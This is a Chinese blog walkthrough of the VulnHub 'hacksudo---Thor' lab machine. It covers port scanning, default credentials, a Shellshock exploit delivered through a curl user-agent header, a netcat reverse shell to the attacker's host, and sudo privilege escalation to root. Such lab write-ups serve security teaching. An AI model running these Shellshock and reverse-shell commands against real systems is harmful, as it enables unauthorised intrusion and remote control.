声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现 端口扫描 WEB目录爬取
开源源码泄漏 默认帐号密码
业务逻辑漏洞 SQL注入
破壳漏洞 GTFOBins提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.144.203
nmap -p22,80 -sV -sC 192.168.144.203 Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-10 00:57 ESTNmap scan report for 192.168.144.203Host is up (0.00036s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey:| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)80/tcp open http Apache httpd 2.4.38 ((Debian))|_http-title: Site doesn't have a title (text/html; charset=UTF-8).|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:EB:8F:E9 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
1.3 WEB信息爬取
http://192.168.144.203/
进行目录爬取
dirsearch -u http://192.168.144.203
http://192.168.144.203/README.md
下载该文件
从该文件描述中
https://github.com/zakee94/online-banking-system/得到该系统网站源码
得到账号admin密码password123
访问
http://192.168.144.203/admin_login.php
登录成功!
1.4 业务逻辑漏洞(没什么用)
https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql访问该页面
找到代码:
INSERT INTO`customer`VALUES(1,'Nafees','Zakee','male','1994-11-28',123456789,'[email protected]','+91 8918722499','22/10, Secondary Road, Durgapur - 713204','delhi',1122334455,1234,'zakee94','nafees123'),(2,'Md Salman','Ali','male','1994-10-11',987654321,'[email protected]','+966 895432167','Al Ahsa Street Malaz, King Abdulaziz Rd, Alamal Dist. RIYADH 12643-2121.','riyadh',1133557788,1234,'salman','salman123'),(3,'Tushar','Kr. Pandey','male','1995-02-03',125656765,'[email protected]','+334 123456987','Champ de Mars, rn5 Avenue Anatole France, rn75007 Paris, France','paris',1122338457,1357,'tushar','tushar123'),(4,'Jon','Snow','male','1985-02-03',129156787,'[email protected]','+1 8918332797','The Night Watch,rnKing in the North,rnThe North Remembers,rnWesteros.','newyork',1233556739,1234,'jon','snow123');
找到账户密码
zakee94 nafees123salman salman123tushar tushar123jon snow123
同样后台管理页面也可以找到账户密码
注:可以在后台管理上新建用户,然后登录其他账户,把钱转到给自己
逻辑漏洞太简单了所以就不演示了
1.5 sql注入(没有什么用)
在Add Customer上随意添加数据然后点击保存就能发现出数据库报错存在sql注入
1.6 破壳漏洞
继续爬取目录专门爬取cgi,sh文件结尾的文件查看是否存在脚本文件
dirsearch -u http://192.168.144.203/cgi-bin/ -f -e cgi,sh
500 响应码为服务器报错
存在bcakup.cgi,shell.sh文件
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 192.168.144.203Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-10 02:32 ESTNmap scan report for 192.168.144.203Host is up (0.00033s latency).PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.38 ((Debian))| http-shellshock:| VULNERABLE:| HTTP Shellshock vulnerability| State: VULNERABLE (Exploitable)| IDs: CVE:CVE-2014-6271| This web application might be affected by the vulnerability known| as Shellshock. It seems the server is executing commands injected| via malicious HTTP headers.|| Disclosure date: 2014-09-24| Exploit results:| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">| <html><head>| <title>500 Internal Server Error</title>| </head><body>| <h1>Internal Server Error</h1>| <p>The server encountered an internal error or| misconfiguration and was unable to complete| your request.</p>| <p>Please contact the server administrator at| webmaster@localhost to inform them of the time this error occurred,| and the actions you performed just before this error.</p>| <p>More information about this error may be available| in the server error log.</p>| <hr>| <address>Apache/2.4.38 (Debian) Server at 192.168.144.203 Port 80</address>| </body></html>|| References:| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169| http://seclists.org/oss-sec/2014/q3/685| http://www.openwall.com/lists/oss-security/2014/09/24/10|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:EB:8F:E9 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds
存在破壳漏洞
curl -H "user-agent:() { :; }; echo; echo; /bin/bash -c 'which nc'" http://192.168.144.203/cgi-bin/shell.sh
验证漏洞存在
这里我用nuclei工具去扫描
http://192.168.144.203/cgi-bin/shell.sh
也是可以得到结果的!
反弹shell
nc -lvnp 4444curl -H "user-agent:() { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.144.247 4444'" http://192.168.144.203/cgi-bin/shell.sh
拿到权限
1.7 提权(GTFOBins)
python3 -c 'import pty;pty.spawn("/bin/bash")' //升级终端sudo -lMatching Defaults entries for www-data on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser www-data may run the following commands on HackSudoThor:(thor) NOPASSWD: /home/thor/./hammer.shbash-4.3$ sudo -lsudo -lMatching Defaults entries for www-data on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser www-data may run the following commands on HackSudoThor:(thor) NOPASSWD: /home/thor/./hammer.sh
可以执行 /home/thor/./hammer.sh这个文件
sudo -u thor /home/thor/./hammer.sh //执行 脚本
要求输出id和massage
当我们在massage输入id的时候会执行系统指令所以我们输入bash 就会执行获取thor权限
终端再次升级
python3 -c 'import pty;pty.spawn("/bin/bash")'sudo -lMatching Defaults entries for thor on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser thor may run the following commands on HackSudoThor:(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
可以执行 cat service 命令
sudo service ../../bin/bashsudo cat /etc/passwd
原文始发于微信公众号(嗨嗨安全):靶机实战系列之hacksudo---Thor靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论